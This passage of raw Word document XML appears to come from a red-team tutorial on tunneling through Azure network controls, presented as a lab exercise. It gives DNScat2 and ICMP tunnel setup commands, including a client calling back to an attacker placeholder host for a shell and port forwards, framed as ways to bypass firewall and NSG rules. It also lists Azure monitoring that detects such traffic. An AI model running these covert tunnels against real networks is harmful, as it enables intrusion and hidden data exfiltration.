        <w:t>Deprecated SOCKS4a/5 modules can still be used but should be replaced with modern equivalents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A6B6B7" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r>
        <w:pict w14:anchorId="4EDA238C">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BC6837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 xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DNScat2 – Covert DNS Tunneling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F6E8BD" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>DNS egress is often open in Azure. Use this to create tunnels via DNS (TCP/53).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194B5D93" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On Attacker (Kali in local lab):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B518BBE" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>apt install dnscat2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026AF2D6" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>ruby dnscat2.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF2A421" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On Azure VM (Ubuntu):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068F5C29" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>git clone https://github.com/iagox86/dnscat2.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CF5707" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>cd client &amp;&amp; make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614A81FB" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>./dnscat --dns=server=YOUR_KALI_IP,port=53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02695D3E" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0F05">
        <w:t>Establishes a DNS tunnel over port 53.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2ACBF2" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0F05">
        <w:t>Use built-in DNScat2 shell or TCP port forwards:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DED423" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>listen 127.0.0.1:8888 10.1.0.10:22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7D2FA9" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>ssh user@127.0.0.1 -p 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9A4448" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t>: Bypass Azure Firewall rules allowing only DNS traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3A487D" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB"/>
    <w:p w14:paraId="02FB9E15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 xml:space="preserve">8. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📡</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ICMP Tunneling (ICMPTunnel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EC47BA" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4888519C" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>Azure NSGs allow ICMP, and you want to tunnel traffic over it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AFB07F" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On Azure Linux VM (Server):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F12B2BB" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>git clone https://github.com/jamesbarlow/icmptunnel.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5F8B6B" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>cd icmptunnel &amp;&amp; make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B747FC2" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>./icmptunnel -s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5600EE" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>/sbin/ifconfig tun0 10.0.0.1 netmask 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316E80EE" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On Attacker VM (Kali):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7754F576" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>./icmptunnel 10.0.0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1159A941" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>/sbin/ifconfig tun0 10.0.0.2 netmask 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BEDFFB" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:t>ssh user@10.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A370F5" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> Use when </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ICMP echo</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:t xml:space="preserve"> is permitted by Azure NSG and Firewall rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09313981" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB"/>
    <w:p w14:paraId="4077BCD1" w14:textId="77777777" w:rsidR="002533AB" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Considerations for Azure Environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C93652F" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533A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7849"/>
      </w:tblGrid>
      <w:tr w:rsidR="002533AB" w:rsidRPr="00FC0F05" w14:paraId="3F3E0024" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D9D8BF3" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC0F05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300EB4E2" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC0F05">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Consideration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002533AB" w:rsidRPr="00FC0F05" w14:paraId="2442D415" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48984E34" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Azure Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15FCF4AA" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>Can block or allow based on FQDNs and ports; tunneling may bypass inspection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002533AB" w:rsidRPr="00FC0F05" w14:paraId="00BA197B" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32CEF78E" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Hub-Spoke Topology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48FBD8D4" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>Tunneling helps bypass NSGs in Hub VNET or DMZ restrictions in Spoke VNET.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002533AB" w:rsidRPr="00FC0F05" w14:paraId="499AC883" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E703CB3" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>NSGs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32D5A800" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>Typically allow outbound SSH, DNS, and ICMP, which can be abused.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002533AB" w:rsidRPr="00FC0F05" w14:paraId="2416B844" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="520B327D" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="129CCAA4" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>Use Azure Defender for DNS, NSG Flow Logs, and Sentinel for detection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16A7D582" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB"/>
    <w:p w14:paraId="3FB696AC" w14:textId="77777777" w:rsidR="002533AB" w:rsidRDefault="002533AB" w:rsidP="002533AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC0F05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABF1209" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="002533AB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9"/>
        <w:gridCol w:w="1073"/>
        <w:gridCol w:w="1184"/>
        <w:gridCol w:w="888"/>
        <w:gridCol w:w="4275"/>
      </w:tblGrid>
      <w:tr w:rsidR="002533AB" w:rsidRPr="00FC0F05" w14:paraId="6040A539" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F23BD08" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC0F05">
              <w:rPr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4917CCF9" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC0F05">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="311F4A0B" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC0F05">
              <w:rPr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18685CD1" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC0F05">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Covert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76BD8913" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC0F05">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Azure Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002533AB" w:rsidRPr="00FC0F05" w14:paraId="781F3D5E" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B0F5759" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>SSH -D (SOCKS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0696AA6E" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D15012C" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>Outbound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09DACC34" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F0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9D8AADA" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>Proxy through internal jump box</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002533AB" w:rsidRPr="00FC0F05" w14:paraId="65742B70" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6182269F" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>SSH -L (Local)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59109C1E" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D421C7D" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>Outbound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C4BCF57" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F0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35DEDB0" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>Local browser access to internal web apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002533AB" w:rsidRPr="00FC0F05" w14:paraId="434B7C55" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34B351DD" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>Revsocks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E584D85" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CA2D708" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>Reverse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E204771" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F0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7618582" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>Reverse tunneling from Azure to attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002533AB" w:rsidRPr="00FC0F05" w14:paraId="3BD2F9F3" w14:textId="77777777" w:rsidTr="00EB1FD4">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41ED93E2" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>DNScat2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="524F181F" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
            <w:r w:rsidRPr="00FC0F05">
              <w:t>DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F5D40FE" w14:textId="77777777" w:rsidR="002533AB" w:rsidRPr="00FC0F05" w:rsidRDefault="002533AB" w:rsidP="00EB1FD4">
